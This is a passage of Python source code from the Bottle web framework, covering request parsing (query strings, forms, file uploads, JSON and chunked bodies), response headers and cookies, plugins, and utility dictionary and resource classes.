@DictProperty('environ', 'bottle.request.query', read_only=True)
def query(self):
""" The :attr:`query_string` parsed into a :class:`FormsDict`. These
values are sometimes called "URL arguments" or "GET parameters", but
not to be confused with "URL wildcards" as they are provided by the
:class:`Router`. """
get = self.environ['bottle.get'] = FormsDict()
pairs = _parse_qsl(self.environ.get('QUERY_STRING', ''))
for key, value in pairs:
get[key] = value
return get
@DictProperty('environ', 'bottle.request.forms', read_only=True)
def forms(self):
""" Form values parsed from an `url-encoded` or `multipart/form-data`
encoded POST or PUT request body. The result is returned as a
:class:`FormsDict`. All keys and values are strings. File uploads
are stored separately in :attr:`files`. """
forms = FormsDict()
for name, item in self.POST.allitems():
if not isinstance(item, FileUpload):
forms[name] = item
return forms
@DictProperty('environ', 'bottle.request.params', read_only=True)
def params(self):
""" A :class:`FormsDict` with the combined values of :attr:`query` and
:attr:`forms`. File uploads are stored in :attr:`files`. """
params = FormsDict()
for key, value in self.query.allitems():
params[key] = value
for key, value in self.forms.allitems():
params[key] = value
return params
@DictProperty('environ', 'bottle.request.files', read_only=True)
def files(self):
""" File uploads parsed from `multipart/form-data` encoded POST or PUT
request body. The values are instances of :class:`FileUpload`.
"""
files = FormsDict()
for name, item in self.POST.allitems():
if isinstance(item, FileUpload):
files[name] = item
return files
@DictProperty('environ', 'bottle.request.json', read_only=True)
def json(self):
""" If the ``Content-Type`` header is ``application/json``, this
property holds the parsed content of the request body. Only requests
smaller than :attr:`MEMFILE_MAX` are processed to avoid memory
exhaustion. """
ctype = self.environ.get('CONTENT_TYPE', '').lower().split(';')[0]
if ctype == 'application/json':
b = self._get_body_string()
if not b:
return None
return json_loads(b)
return None
def _iter_body(self, read, bufsize):
maxread = max(0, self.content_length)
while maxread:
part = read(min(maxread, bufsize))
if not part: break
yield part
maxread -= len(part)
@staticmethod
def _iter_chunked(read, bufsize):
err = HTTPError(400, 'Error while parsing chunked transfer body.')
rn, sem, bs = tob('\r\n'), tob(';'), tob('')
while True:
header = read(1)
while header[-2:] != rn:
c = read(1)
header += c
if not c: raise err
if len(header) > bufsize: raise err
size, _, _ = header.partition(sem)
try:
maxread = int(tonat(size.strip()), 16)
except ValueError:
raise err
if maxread == 0: break
buff = bs
while maxread > 0:
if not buff:
buff = read(min(maxread, bufsize))
part, buff = buff[:maxread], buff[maxread:]
if not part: raise err
yield part
maxread -= len(part)
if read(2) != rn:
raise err
@DictProperty('environ', 'bottle.request.body', read_only=True)
def _body(self):
body_iter = self._iter_chunked if self.chunked else self._iter_body
read_func = self.environ['wsgi.input'].read
body, body_size, is_temp_file = BytesIO(), 0, False
for part in body_iter(read_func, self.MEMFILE_MAX):
body.write(part)
body_size += len(part)
if not is_temp_file and body_size > self.MEMFILE_MAX:
body, tmp = TemporaryFile(mode='w+b'), body
body.write(tmp.getvalue())
del tmp
is_temp_file = True
self.environ['wsgi.input'] = body
body.seek(0)
return body
def _get_body_string(self):
""" read body until content-length or MEMFILE_MAX into a string. Raise
HTTPError(413) on requests that are to large. """
clen = self.content_length
if clen > self.MEMFILE_MAX:
raise HTTPError(413, 'Request too large')
if clen < 0: clen = self.MEMFILE_MAX + 1
data = self.body.read(clen)
if len(data) > self.MEMFILE_MAX: # Fail fast
raise HTTPError(413, 'Request too large')
return data
@property
def body(self):
""" The HTTP request body as a seek-able file-like object. Depending on
:attr:`MEMFILE_MAX`, this is either a temporary file or a
:class:`io.BytesIO` instance. Accessing this property for the first
time reads and replaces the ``wsgi.input`` environ variable.
Subsequent accesses just do a `seek(0)` on the file object. """
self._body.seek(0)
return self._body
@property
def chunked(self):
""" True if Chunked transfer encoding was. """
return 'chunked' in self.environ.get('HTTP_TRANSFER_ENCODING', '').lower()
#: An alias for :attr:`query`.
GET = query
@DictProperty('environ', 'bottle.request.post', read_only=True)
def POST(self):
""" The values of :attr:`forms` and :attr:`files` combined into a single
:class:`FormsDict`. Values are either strings (form values) or
instances of :class:`cgi.FieldStorage` (file uploads).
"""
post = FormsDict()
# We default to application/x-www-form-urlencoded for everything that
# is not multipart and take the fast path (also: 3.1 workaround)
if not self.content_type.startswith('multipart/'):
pairs = _parse_qsl(tonat(self._get_body_string(), 'latin1'))
for key, value in pairs:
post[key] = value
return post
safe_env = {'QUERY_STRING':''} # Build a safe environment for cgi
for key in ('REQUEST_METHOD', 'CONTENT_TYPE', 'CONTENT_LENGTH'):
if key in self.environ: safe_env[key] = self.environ[key]
args = dict(fp=self.body, environ=safe_env, keep_blank_values=True)
if py31:
args['fp'] = NCTextIOWrapper(args['fp'], encoding='utf8',
newline='\n')
elif py3k:
args['encoding'] = 'utf8'
data = cgi.FieldStorage(**args)
self['_cgi.FieldStorage'] = data #http://bugs.python.org/issue18394#msg207958
data = data.list or []
for item in data:
if item.filename:
post[item.name] = FileUpload(item.file, item.name,
item.filename, item.headers)
else:
post[item.name] = item.value
return post
@property
def url(self):
""" The full request URI including hostname and scheme. If your app
lives behind a reverse proxy or load balancer and you get confusing
results, make sure that the ``X-Forwarded-Host`` header is set
correctly. """
return self.urlparts.geturl()
@DictProperty('environ', 'bottle.request.urlparts', read_only=True)
def urlparts(self):
""" The :attr:`url` string as an :class:`urlparse.SplitResult` tuple.
The tuple contains (scheme, host, path, query_string and fragment),
but the fragment is always empty because it is not visible to the
server. """
env = self.environ
http = env.get('HTTP_X_FORWARDED_PROTO') or env.get('wsgi.url_scheme', 'http')
host = env.get('HTTP_X_FORWARDED_HOST') or env.get('HTTP_HOST')
if not host:
# HTTP 1.1 requires a Host-header. This is for HTTP/1.0 clients.
host = env.get('SERVER_NAME', '127.0.0.1')
port = env.get('SERVER_PORT')
if port and port != ('80' if http == 'http' else '443'):
host += ':' + port
path = urlquote(self.fullpath)
return UrlSplitResult(http, host, path, env.get('QUERY_STRING'), '')
@property
def fullpath(self):
""" Request path including :attr:`script_name` (if present). """
return urljoin(self.script_name, self.path.lstrip('/'))
@property
def query_string(self):
""" The raw :attr:`query` part of the URL (everything in between ``?``
and ``#``) as a string. """
return self.environ.get('QUERY_STRING', '')
@property
def script_name(self):
""" The initial portion of the URL's `path` that was removed by a higher
level (server or routing middleware) before the application was
called. This script path is returned with leading and tailing
slashes. """
script_name = self.environ.get('SCRIPT_NAME', '').strip('/')
return '/' + script_name + '/' if script_name else '/'
def path_shift(self, shift=1):
""" Shift path segments from :attr:`path` to :attr:`script_name` and
vice versa.
:param shift: The number of path segments to shift. May be negative
to change the shift direction. (default: 1)
"""
script = self.environ.get('SCRIPT_NAME','/')
self['SCRIPT_NAME'], self['PATH_INFO'] = path_shift(script, self.path, shift)
@property
def content_length(self):
""" The request body length as an integer. The client is responsible to
set this header. Otherwise, the real length of the body is unknown
and -1 is returned. In this case, :attr:`body` will be empty. """
return int(self.environ.get('CONTENT_LENGTH') or -1)
@property
def content_type(self):
""" The Content-Type header as a lowercase-string (default: empty). """
return self.environ.get('CONTENT_TYPE', '').lower()
@property
def is_xhr(self):
""" True if the request was triggered by a XMLHttpRequest. This only
works with JavaScript libraries that support the `X-Requested-With`
header (most of the popular libraries do). """
requested_with = self.environ.get('HTTP_X_REQUESTED_WITH','')
return requested_with.lower() == 'xmlhttprequest'
@property
def is_ajax(self):
""" Alias for :attr:`is_xhr`. "Ajax" is not the right term. """
return self.is_xhr
@property
def auth(self):
""" HTTP authentication data as a (user, password) tuple. This
implementation currently supports basic (not digest) authentication
only. If the authentication happened at a higher level (e.g. in the
front web-server or a middleware), the password field is None, but
the user field is looked up from the ``REMOTE_USER`` environ
variable. On any errors, None is returned. """
basic = parse_auth(self.environ.get('HTTP_AUTHORIZATION',''))
if basic: return basic
ruser = self.environ.get('REMOTE_USER')
if ruser: return (ruser, None)
return None
@property
def remote_route(self):
""" A list of all IPs that were involved in this request, starting with
the client IP and followed by zero or more proxies. This does only
work if all proxies support the ```X-Forwarded-For`` header. Note
that this information can be forged by malicious clients. """
proxy = self.environ.get('HTTP_X_FORWARDED_FOR')
if proxy: return [ip.strip() for ip in proxy.split(',')]
remote = self.environ.get('REMOTE_ADDR')
return [remote] if remote else []
@property
def remote_addr(self):
""" The client IP as a string. Note that this information can be forged
by malicious clients. """
route = self.remote_route
return route[0] if route else None
def copy(self):
""" Return a new :class:`Request` with a shallow :attr:`environ` copy. """
return Request(self.environ.copy())
def get(self, value, default=None): return self.environ.get(value, default)
def __getitem__(self, key): return self.environ[key]
def __delitem__(self, key): self[key] = ""; del(self.environ[key])
def __iter__(self): return iter(self.environ)
def __len__(self): return len(self.environ)
def keys(self): return self.environ.keys()
def __setitem__(self, key, value):
""" Change an environ value and clear all caches that depend on it. """
if self.environ.get('bottle.request.readonly'):
raise KeyError('The environ dictionary is read-only.')
self.environ[key] = value
todelete = ()
if key == 'wsgi.input':
todelete = ('body', 'forms', 'files', 'params', 'post', 'json')
elif key == 'QUERY_STRING':
todelete = ('query', 'params')
elif key.startswith('HTTP_'):
todelete = ('headers', 'cookies')
for key in todelete:
self.environ.pop('bottle.request.'+key, None)
def __repr__(self):
return '<%s: %s %s>' % (self.__class__.__name__, self.method, self.url)
def __getattr__(self, name):
""" Search in self.environ for additional user defined attributes. """
try:
var = self.environ['bottle.request.ext.%s'%name]
return var.__get__(self) if hasattr(var, '__get__') else var
except KeyError:
raise AttributeError('Attribute %r not defined.' % name)
def __setattr__(self, name, value):
if name == 'environ': return object.__setattr__(self, name, value)
self.environ['bottle.request.ext.%s'%name] = value
def _hkey(s):
return s.title().replace('_','-')
class HeaderProperty(object):
def __init__(self, name, reader=None, writer=str, default=''):
self.name, self.default = name, default
self.reader, self.writer = reader, writer
self.__doc__ = 'Current value of the %r header.' % name.title()
def __get__(self, obj, _):
if obj is None: return self
value = obj.headers.get(self.name, self.default)
return self.reader(value) if self.reader else value
def __set__(self, obj, value):
obj.headers[self.name] = self.writer(value)
def __delete__(self, obj):
del obj.headers[self.name]
class BaseResponse(object):
""" Storage class for a response body as well as headers and cookies.
This class does support dict-like case-insensitive item-access to
headers, but is NOT a dict. Most notably, iterating over a response
yields parts of the body and not the headers.
:param body: The response body as one of the supported types.
:param status: Either an HTTP status code (e.g. 200) or a status line
including the reason phrase (e.g. '200 OK').
:param headers: A dictionary or a list of name-value pairs.
Additional keyword arguments are added to the list of headers.
Underscores in the header name are replaced with dashes.
"""
default_status = 200
default_content_type = 'text/html; charset=UTF-8'
# Header blacklist for specific response codes
# (rfc2616 section 10.2.3 and 10.3.5)
bad_headers = {
204: set(('Content-Type',)),
304: set(('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Range', 'Content-Type',
'Content-Md5', 'Last-Modified'))}
def __init__(self, body='', status=None, headers=None, **more_headers):
self._cookies = None
self._headers = {}
self.body = body
self.status = status or self.default_status
if headers:
if isinstance(headers, dict):
headers = headers.items()
for name, value in headers:
self.add_header(name, value)
if more_headers:
for name, value in more_headers.items():
self.add_header(name, value)
def copy(self, cls=None):
""" Returns a copy of self. """
cls = cls or BaseResponse
assert issubclass(cls, BaseResponse)
copy = cls()
copy.status = self.status
copy._headers = dict((k, v[:]) for (k, v) in self._headers.items())
if self._cookies:
copy._cookies = SimpleCookie()
copy._cookies.load(self._cookies.output())
return copy
def __iter__(self):
return iter(self.body)
def close(self):
if hasattr(self.body, 'close'):
self.body.close()
@property
def status_line(self):
""" The HTTP status line as a string (e.g. ``404 Not Found``)."""
return self._status_line
@property
def status_code(self):
""" The HTTP status code as an integer (e.g. 404)."""
return self._status_code
def _set_status(self, status):
if isinstance(status, int):
code, status = status, _HTTP_STATUS_LINES.get(status)
elif ' ' in status:
status = status.strip()
code = int(status.split()[0])
else:
raise ValueError('String status line without a reason phrase.')
if not 100 <= code <= 999: raise ValueError('Status code out of range.')
self._status_code = code
self._status_line = str(status or ('%d Unknown' % code))
def _get_status(self):
return self._status_line
status = property(_get_status, _set_status, None,
''' A writeable property to change the HTTP response status. It accepts
either a numeric code (100-999) or a string with a custom reason
phrase (e.g. "404 Brain not found"). Both :data:`status_line` and
:data:`status_code` are updated accordingly. The return value is
always a status string. ''')
del _get_status, _set_status
@property
def headers(self):
""" An instance of :class:`HeaderDict`, a case-insensitive dict-like
view on the response headers. """
hdict = HeaderDict()
hdict.dict = self._headers
return hdict
def __contains__(self, name): return _hkey(name) in self._headers
def __delitem__(self, name): del self._headers[_hkey(name)]
def __getitem__(self, name): return self._headers[_hkey(name)][-1]
def __setitem__(self, name, value): self._headers[_hkey(name)] = [str(value)]
def get_header(self, name, default=None):
""" Return the value of a previously defined header. If there is no
header with that name, return a default value. """
return self._headers.get(_hkey(name), [default])[-1]
def set_header(self, name, value):
""" Create a new response header, replacing any previously defined
headers with the same name. """
self._headers[_hkey(name)] = [str(value)]
def add_header(self, name, value):
""" Add an additional response header, not removing duplicates. """
self._headers.setdefault(_hkey(name), []).append(str(value))
def iter_headers(self):
""" Yield (header, value) tuples, skipping headers that are not
allowed with the current response status code. """
return self.headerlist
@property
def headerlist(self):
""" WSGI conform list of (header, value) tuples. """
out = []
headers = list(self._headers.items())
if 'Content-Type' not in self._headers:
headers.append(('Content-Type', [self.default_content_type]))
if self._status_code in self.bad_headers:
bad_headers = self.bad_headers[self._status_code]
headers = [h for h in headers if h[0] not in bad_headers]
out += [(name, val) for name, vals in headers for val in vals]
if self._cookies:
for c in self._cookies.values():
out.append(('Set-Cookie', c.OutputString()))
return out
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int)
expires = HeaderProperty('Expires',
reader=lambda x: datetime.utcfromtimestamp(parse_date(x)),
writer=lambda x: http_date(x))
@property
def charset(self, default='UTF-8'):
""" Return the charset specified in the content-type header (default: utf8). """
if 'charset=' in self.content_type:
return self.content_type.split('charset=')[-1].split(';')[0].strip()
return default
def set_cookie(self, name, value, secret=None, **options):
""" Create a new cookie or replace an old one. If the `secret` parameter is
set, create a `Signed Cookie` (described below).
:param name: the name of the cookie.
:param value: the value of the cookie.
:param secret: a signature key required for signed cookies.
Additionally, this method accepts all RFC 2109 attributes that are
supported by :class:`cookie.Morsel`, including:
:param max_age: maximum age in seconds. (default: None)
:param expires: a datetime object or UNIX timestamp. (default: None)
:param domain: the domain that is allowed to read the cookie.
(default: current domain)
:param path: limits the cookie to a given path (default: current path)
:param secure: limit the cookie to HTTPS connections (default: off).
:param httponly: prevents client-side javascript to read this cookie
(default: off, requires Python 2.6 or newer).
If neither `expires` nor `max_age` is set (default), the cookie will
expire at the end of the browser session (as soon as the browser
window is closed).
Signed cookies may store any pickle-able object and are
cryptographically signed to prevent manipulation. Keep in mind that
cookies are limited to 4kb in most browsers.
Warning: Signed cookies are not encrypted (the client can still see
the content) and not copy-protected (the client can restore an old
cookie). The main intention is to make pickling and unpickling
save, not to store secret information at client side.
"""
if not self._cookies:
self._cookies = SimpleCookie()
if secret:
value = touni(cookie_encode((name, value), secret))
elif not isinstance(value, basestring):
raise TypeError('Secret key missing for non-string Cookie.')
if len(value) > 4096: raise ValueError('Cookie value to long.')
self._cookies[name] = value
for key, value in options.items():
if key == 'max_age':
if isinstance(value, timedelta):
value = value.seconds + value.days * 24 * 3600
if key == 'expires':
if isinstance(value, (datedate, datetime)):
value = value.timetuple()
elif isinstance(value, (int, float)):
value = time.gmtime(value)
value = time.strftime("%a, %d %b %Y %H:%M:%S GMT", value)
self._cookies[name][key.replace('_', '-')] = value
def delete_cookie(self, key, **kwargs):
""" Delete a cookie. Be sure to use the same `domain` and `path`
settings as used to create the cookie. """
kwargs['max_age'] = -1
kwargs['expires'] = 0
self.set_cookie(key, '', **kwargs)
def __repr__(self):
out = ''
for name, value in self.headerlist:
out += '%s: %s\n' % (name.title(), value.strip())
return out
def _local_property():
ls = threading.local()
def fget(_):
try: return ls.var
except AttributeError:
raise RuntimeError("Request context not initialized.")
def fset(_, value): ls.var = value
def fdel(_): del ls.var
return property(fget, fset, fdel, 'Thread-local property')
class LocalRequest(BaseRequest):
""" A thread-local subclass of :class:`BaseRequest` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`request`). If accessed during a
request/response cycle, this instance always refers to the *current*
request (even on a multithreaded server). """
bind = BaseRequest.__init__
environ = _local_property()
class LocalResponse(BaseResponse):
""" A thread-local subclass of :class:`BaseResponse` with a different
set of attributes for each thread. There is usually only one global
instance of this class (:data:`response`). Its attributes are used
to build the HTTP response at the end of the request/response cycle.
"""
bind = BaseResponse.__init__
_status_line = _local_property()
_status_code = _local_property()
_cookies = _local_property()
_headers = _local_property()
body = _local_property()
Request = BaseRequest
Response = BaseResponse
class HTTPResponse(Response, BottleException):
def __init__(self, body='', status=None, headers=None, **more_headers):
super(HTTPResponse, self).__init__(body, status, headers, **more_headers)
def apply(self, other):
other._status_code = self._status_code
other._status_line = self._status_line
other._headers = self._headers
other._cookies = self._cookies
other.body = self.body
class HTTPError(HTTPResponse):
default_status = 500
def __init__(self, status=None, body=None, exception=None, traceback=None,
**options):
self.exception = exception
self.traceback = traceback
super(HTTPError, self).__init__(body, status, **options)
###############################################################################
# Plugins ######################################################################
###############################################################################
class PluginError(BottleException): pass
class JSONPlugin(object):
name = 'json'
api = 2
def __init__(self, json_dumps=json_dumps):
self.json_dumps = json_dumps
def apply(self, callback, _):
dumps = self.json_dumps
if not dumps: return callback
def wrapper(*a, **ka):
try:
rv = callback(*a, **ka)
except HTTPError:
rv = _e()
if isinstance(rv, dict):
#Attempt to serialize, raises exception on failure
json_response = dumps(rv)
#Set content type only if serialization successful
response.content_type = 'application/json'
return json_response
elif isinstance(rv, HTTPResponse) and isinstance(rv.body, dict):
rv.body = dumps(rv.body)
rv.content_type = 'application/json'
return rv
return wrapper
class TemplatePlugin(object):
""" This plugin applies the :func:`view` decorator to all routes with a
`template` config parameter. If the parameter is a tuple, the second
element must be a dict with additional options (e.g. `template_engine`)
or default variables for the template. """
name = 'template'
api = 2
def apply(self, callback, route):
conf = route.config.get('template')
if isinstance(conf, (tuple, list)) and len(conf) == 2:
return view(conf[0], **conf[1])(callback)
elif isinstance(conf, str):
return view(conf)(callback)
else:
return callback
#: Not a plugin, but part of the plugin API. TODO: Find a better place.
class _ImportRedirect(object):
def __init__(self, name, impmask):
""" Create a virtual package that redirects imports (see PEP 302). """
self.name = name
self.impmask = impmask
self.module = sys.modules.setdefault(name, imp.new_module(name))
self.module.__dict__.update({'__file__': __file__, '__path__': [],
'__all__': [], '__loader__': self})
sys.meta_path.append(self)
def find_module(self, fullname, path=None):
if '.' not in fullname: return
packname = fullname.rsplit('.', 1)[0]
if packname != self.name: return
return self
def load_module(self, fullname):
if fullname in sys.modules: return sys.modules[fullname]
modname = fullname.rsplit('.', 1)[1]
realname = self.impmask % modname
__import__(realname)
module = sys.modules[fullname] = sys.modules[realname]
setattr(self.module, modname, module)
module.__loader__ = self
return module
###############################################################################
# Common Utilities #############################################################
###############################################################################
class MultiDict(DictMixin):
""" This dict stores multiple values per key, but behaves exactly like a
normal dict in that it returns only the newest value for any given key.
There are special methods available to access the full list of values.
"""
def __init__(self, *a, **k):
self.dict = dict((k, [v]) for (k, v) in dict(*a, **k).items())
def __len__(self): return len(self.dict)
def __iter__(self): return iter(self.dict)
def __contains__(self, key): return key in self.dict
def __delitem__(self, key): del self.dict[key]
def __getitem__(self, key): return self.dict[key][-1]
def __setitem__(self, key, value): self.append(key, value)
def keys(self): return self.dict.keys()
if py3k:
def values(self): return (v[-1] for v in self.dict.values())
def items(self): return ((k, v[-1]) for k, v in self.dict.items())
def allitems(self):
return ((k, v) for k, vl in self.dict.items() for v in vl)
iterkeys = keys
itervalues = values
iteritems = items
iterallitems = allitems
else:
def values(self): return [v[-1] for v in self.dict.values()]
def items(self): return [(k, v[-1]) for k, v in self.dict.items()]
def iterkeys(self): return self.dict.iterkeys()
def itervalues(self): return (v[-1] for v in self.dict.itervalues())
def iteritems(self):
return ((k, v[-1]) for k, v in self.dict.iteritems())
def iterallitems(self):
return ((k, v) for k, vl in self.dict.iteritems() for v in vl)
def allitems(self):
return [(k, v) for k, vl in self.dict.iteritems() for v in vl]
def get(self, key, default=None, index=-1, type=None):
""" Return the most recent value for a key.
:param default: The default value to be returned if the key is not
present or the type conversion fails.
:param index: An index for the list of available values.
:param type: If defined, this callable is used to cast the value
into a specific type. Exception are suppressed and result in
the default value to be returned.
"""
try:
val = self.dict[key][index]
return type(val) if type else val
except Exception:
pass
return default
def append(self, key, value):
""" Add a new value to the list of values for this key. """
self.dict.setdefault(key, []).append(value)
def replace(self, key, value):
""" Replace the list of values with a single value. """
self.dict[key] = [value]
def getall(self, key):
""" Return a (possibly empty) list of values for a key. """
return self.dict.get(key) or []
#: Aliases for WTForms to mimic other multi-dict APIs (Django)
getone = get
getlist = getall
class FormsDict(MultiDict):
""" This :class:`MultiDict` subclass is used to store request form data.
Additionally to the normal dict-like item access methods (which return
unmodified data as native strings), this container also supports
attribute-like access to its values. Attributes are automatically de-
or recoded to match :attr:`input_encoding` (default: 'utf8'). Missing
attributes default to an empty string. """
#: Encoding used for attribute values.
input_encoding = 'utf8'
#: If true (default), unicode strings are first encoded with `latin1`
#: and then decoded to match :attr:`input_encoding`.
recode_unicode = True
def _fix(self, s, encoding=None):
if isinstance(s, unicode) and self.recode_unicode: # Python 3 WSGI
return s.encode('latin1').decode(encoding or self.input_encoding)
elif isinstance(s, bytes): # Python 2 WSGI
return s.decode(encoding or self.input_encoding)
else:
return s
def decode(self, encoding=None):
""" Returns a copy with all keys and values de- or recoded to match
:attr:`input_encoding`. Some libraries (e.g. WTForms) want a
unicode dictionary. """
copy = FormsDict()
enc = copy.input_encoding = encoding or self.input_encoding
copy.recode_unicode = False
for key, value in self.allitems():
copy.append(self._fix(key, enc), self._fix(value, enc))
return copy
def getunicode(self, name, default=None, encoding=None):
""" Return the value as a unicode string, or the default. """
try:
return self._fix(self[name], encoding)
except (UnicodeError, KeyError):
return default
def __getattr__(self, name, default=unicode()):
# Without this guard, pickle generates a cryptic TypeError:
if name.startswith('__') and name.endswith('__'):
return super(FormsDict, self).__getattr__(name)
return self.getunicode(name, default=default)
class HeaderDict(MultiDict):
""" A case-insensitive version of :class:`MultiDict` that defaults to
replace the old value instead of appending it. """
def __init__(self, *a, **ka):
self.dict = {}
if a or ka: self.update(*a, **ka)
def __contains__(self, key): return _hkey(key) in self.dict
def __delitem__(self, key): del self.dict[_hkey(key)]
def __getitem__(self, key): return self.dict[_hkey(key)][-1]
def __setitem__(self, key, value): self.dict[_hkey(key)] = [str(value)]
def append(self, key, value):
self.dict.setdefault(_hkey(key), []).append(str(value))
def replace(self, key, value): self.dict[_hkey(key)] = [str(value)]
def getall(self, key): return self.dict.get(_hkey(key)) or []
def get(self, key, default=None, index=-1):
return MultiDict.get(self, _hkey(key), default, index)
def filter(self, names):
for name in [_hkey(n) for n in names]:
if name in self.dict:
del self.dict[name]
class WSGIHeaderDict(DictMixin):
""" This dict-like class wraps a WSGI environ dict and provides convenient
access to HTTP_* fields. Keys and values are native strings
(2.x bytes or 3.x unicode) and keys are case-insensitive. If the WSGI
environment contains non-native string values, these are de- or encoded
using a lossless 'latin1' character set.
The API will remain stable even on changes to the relevant PEPs.
Currently PEP 333, 444 and 3333 are supported. (PEP 444 is the only one
that uses non-native strings.)
"""
#: List of keys that do not have a ``HTTP_`` prefix.
cgikeys = ('CONTENT_TYPE', 'CONTENT_LENGTH')
def __init__(self, environ):
self.environ = environ
def _ekey(self, key):
""" Translate header field name to CGI/WSGI environ key. """
key = key.replace('-','_').upper()
if key in self.cgikeys:
return key
return 'HTTP_' + key
def raw(self, key, default=None):
""" Return the header value as is (may be bytes or unicode). """
return self.environ.get(self._ekey(key), default)
def __getitem__(self, key):
return tonat(self.environ[self._ekey(key)], 'latin1')
def __setitem__(self, key, value):
raise TypeError("%s is read-only." % self.__class__)
def __delitem__(self, key):
raise TypeError("%s is read-only." % self.__class__)
def __iter__(self):
for key in self.environ:
if key[:5] == 'HTTP_':
yield _hkey(key[5:])
elif key in self.cgikeys:
yield _hkey(key)
def keys(self): return [x for x in self]
def __len__(self): return len(self.keys())
def __contains__(self, key): return self._ekey(key) in self.environ
class ConfigDict(dict):
""" A dict-like configuration storage with additional support for
namespaces, validators, meta-data, on_change listeners and more.
"""
__slots__ = ('_meta', '_on_change')
def __init__(self):
self._meta = {}
self._on_change = lambda name, value: None
def load_config(self, filename):
""" Load values from an ``*.ini`` style config file.
If the config file contains sections, their names are used as
namespaces for the values within. The two special sections
``DEFAULT`` and ``bottle`` refer to the root namespace (no prefix).
"""
conf = ConfigParser()
conf.read(filename)
for section in conf.sections():
for key, value in conf.items(section):
if section not in ('DEFAULT', 'bottle'):
key = section + '.' + key
self[key] = value
return self
def load_dict(self, source, namespace=''):
""" Load values from a dictionary structure. Nesting can be used to
represent namespaces.
>>> c = ConfigDict()
>>> c.load_dict({'some': {'namespace': {'key': 'value'} } })
{'some.namespace.key': 'value'}
"""
for key, value in source.items():
if isinstance(key, str):
nskey = (namespace + '.' + key).strip('.')
if isinstance(value, dict):
self.load_dict(value, namespace=nskey)
else:
self[nskey] = value
else:
raise TypeError('Key has type %r (not a string)' % type(key))
return self
def update(self, *a, **ka):
""" If the first parameter is a string, all keys are prefixed with this
namespace. Apart from that it works just as the usual dict.update().
Example: ``update('some.namespace', key='value')`` """
prefix = ''
if a and isinstance(a[0], str):
prefix = a[0].strip('.') + '.'
a = a[1:]
for key, value in dict(*a, **ka).items():
self[prefix+key] = value
def setdefault(self, key, value):
if key not in self:
self[key] = value
def __setitem__(self, key, value):
if not isinstance(key, str):
raise TypeError('Key has type %r (not a string)' % type(key))
value = self.meta_get(key, 'filter', lambda x: x)(value)
if key in self and self[key] is value:
return
self._on_change(key, value)
dict.__setitem__(self, key, value)
def __delitem__(self, key):
self._on_change(key, None)
dict.__delitem__(self, key)
def meta_get(self, key, metafield, default=None):
""" Return the value of a meta field for a key. """
return self._meta.get(key, {}).get(metafield, default)
def meta_set(self, key, metafield, value):
""" Set the meta field for a key to a new value. This triggers the
on-change handler for existing keys. """
self._meta.setdefault(key, {})[metafield] = value
if key in self:
self[key] = self[key]
def meta_list(self, key):
""" Return an iterable of meta field names defined for a key. """
return self._meta.get(key, {}).keys()
class AppStack(list):
""" A stack-like list. Calling it returns the head of the stack. """
def __call__(self):
""" Return the current default application. """
return self[-1]
def push(self, value=None):
""" Add a new :class:`Bottle` instance to the stack """
if not isinstance(value, Bottle):
value = Bottle()
self.append(value)
return value
class WSGIFileWrapper(object):
def __init__(self, fp, buffer_size=1024*64):
self.fp, self.buffer_size = fp, buffer_size
for attr in ('fileno', 'close', 'read', 'readlines', 'tell', 'seek'):
if hasattr(fp, attr): setattr(self, attr, getattr(fp, attr))
def __iter__(self):
buff, read = self.buffer_size, self.read
while True:
part = read(buff)
if not part: return
yield part
class _closeiter(object):
""" This only exists to be able to attach a .close method to iterators that
do not support attribute assignment (most of itertools). """
def __init__(self, iterator, close=None):
self.iterator = iterator
self.close_callbacks = makelist(close)
def __iter__(self):
return iter(self.iterator)
def close(self):
for func in self.close_callbacks:
func()
class ResourceManager(object):
""" This class manages a list of search paths and helps to find and open
application-bound resources (files).
:param base: default value for :meth:`add_path` calls.
:param opener: callable used to open resources.
:param cachemode: controls which lookups are cached. One of 'all',
'found' or 'none'.
"""
def __init__(self, base='./', opener=open, cachemode='all'):
self.opener = opener
self.base = base
self.cachemode = cachemode
#: A list of search paths. See :meth:`add_path` for details.
self.path = []
#: A cache for resolved paths. ``res.cache.clear()`` clears the cache.
self.cache = {}
def add_path(self, path, base=None, index=None, create=False):
""" Add a new path to the list of search paths. Return False if the
path does not exist.
:param path: The new search path. Relative paths are turned into
an absolute and normalized form. If the path looks like a file
(not ending in `/`), the filename is stripped off.
:param base: Path used to absolutize relative search paths.
Defaults to :attr:`base` which defaults to ``os.getcwd()``.
:param index: Position within the list of search paths. Defaults
to last index (appends to the list).
The `base` parameter makes it easy to reference files installed
along with a python module or package::
res.add_path('./resources/', __file__)
"""
base = os.path.abspath(os.path.dirname(base or self.base))
path = os.path.abspath(os.path.join(base, os.path.dirname(path)))
path += os.sep
if path in self.path:
self.path.remove(path)
if create and not os.path.isdir(path):
os.makedirs(path)
if index is None:
self.path.append(path)
else:
self.path.insert(index, path)
self.cache.clear()
return os.path.exists(path)
def __iter__(self):
""" Iterate over all existing files in all registered paths. """
search = self.path[:]
while search:
path = search.pop()
if not os.path.isdir(path): continue
for name in os.listdir(path):
full = os.path.join(path, name)
if os.path.isdir(full): search.append(full)
else: yield full
def lookup(self, name):
""" Search for a resource and return an absolute file path, or `None`.
The :attr:`path` list is searched in order. The first match is
returend. Symlinks are followed. The result is cached to speed up
future lookups. """
if name not in self.cache or DEBUG:
for path in self.path:
fpath = os.path.join(path, name)
if os.path.isfile(fpath):
if self.cachemode in ('all', 'found'):
self.cache[name] = fpath
return fpath
if self.cachemode == 'all':
self.cache[name] = None
return self.cache[name]
def open(self, name, mode='r', *args, **kwargs):
""" Find a resource and return a file object, or raise IOError. """
fname = self.lookup(name)
if not fname: raise IOError("Resource %r not found." % name)
return self.opener(fname, mode=mode, *args, **kwargs)
class FileUpload(object):
def __init__(self, fileobj, name, filename, headers=None):
""" Wrapper for file uploads. """
#: Open file(-like) object (BytesIO buffer or temporary file)
self.file = fileobj
#: Name of the upload form field
self.name = name
#: Raw filename as sent by the client (may contain unsafe characters)
self.raw_filename = filename
#: A :class:`HeaderDict` with additional headers (e.g. content-type)
self.headers = HeaderDict(headers) if headers else HeaderDict()
content_type = HeaderProperty('Content-Type')
content_length = HeaderProperty('Content-Length', reader=int, default=-1)
@cached_property
def filename(self):
""" Name of the file on the client file system, but normalized to ensure
file system compatibility. An empty filename is returned as 'empty'.
Only ASCII letters, digits, dashes, underscores and dots are
allowed in the final filename. Accents are removed, if possible.
